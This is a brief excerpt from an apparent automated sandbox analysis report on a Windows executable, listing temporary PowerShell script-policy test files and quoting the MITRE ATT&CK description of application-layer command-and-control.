C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qudpziu.2b3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1t3cykk.f4o.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyssz4ha.cm4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1gdtdkr.1yv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nexmvblu.fpo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tn42k5yh.x05.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfjkelc4.tdx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zh4fzbaa.xv1.ps1

C:\Users\user\AppData\Local\Temp\tmpD53.tmp

Windows Analysis Report
VQsnGWaNi5.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre